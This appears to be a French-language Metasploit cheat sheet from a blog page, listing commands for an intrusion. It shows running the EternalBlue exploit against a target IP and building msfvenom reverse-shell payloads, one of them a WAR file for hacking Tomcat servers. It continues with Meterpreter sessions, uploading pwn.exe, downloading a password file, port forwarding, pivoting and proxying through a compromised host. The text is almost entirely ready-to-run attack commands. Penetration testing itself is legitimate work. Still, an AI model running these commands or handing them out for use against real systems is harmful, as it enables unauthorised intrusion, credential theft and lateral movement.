Le framework Metasploit

Démarrer Metasploit
# msfconsole

Chercher un exploit:
# search eternalblue

Utiliser un exploit
# use exploit/windows/smb/ms17_010_eternalblue

Configurer les paramètres de l’exploit

# show options
# set TARGET 192.168.2.55

Exécuter l’exploit
# exploit

Générer le code pour un reverse SHELL (WAR). Pour hacker un serveur Apache Tomcat
# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.33 LPORT=443 -f war > sh.war

Reverse shell payload
msfvenom -p linux/x64/shell/meterpreter_reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443

Reverse shell listener avec msfconsole

# use exploit/multi/handler
# set payload linux/x64/shell_reverse_tcp
# set LHOST 192.168.2.33
# set LPORT 443
# exploit

Upgrade vers Meterpreter
# sessions -j
# background
# list sessions
# sessions -u 1
# sessions 2
# sysinfo # commande meterpreter

Téléverser / Télécharger un fichier (meterpreter)
# upload pwn.exe
# download c:\password.txt

Créer un port sur la machine de l’attaqueur pour accéder à un service qui n’est pas directement accessible (meterpreter)
# portfwd add -l 3306 -p 3306 -r 10.5.24.24
# mysql -u root localhost

Pivoter en utilisante une session Meterpreter existante
# use post/multi/manager/autoroute
# set session 2 #meterpreter session
# run
# route

Socks via Meterpreter (requiert autoroute)
# use auxiliary/server/socks4a
# set SRVPORT 8080
# run

Configurer ProxyChains
# vi /etc/proxychains.conf
[…]
socks4 127.0.0.1 8080

se connecter en utilisant un proxy SOCKS:
#proxychains ncat 172.23.33.33 1337

Laisser un commentaire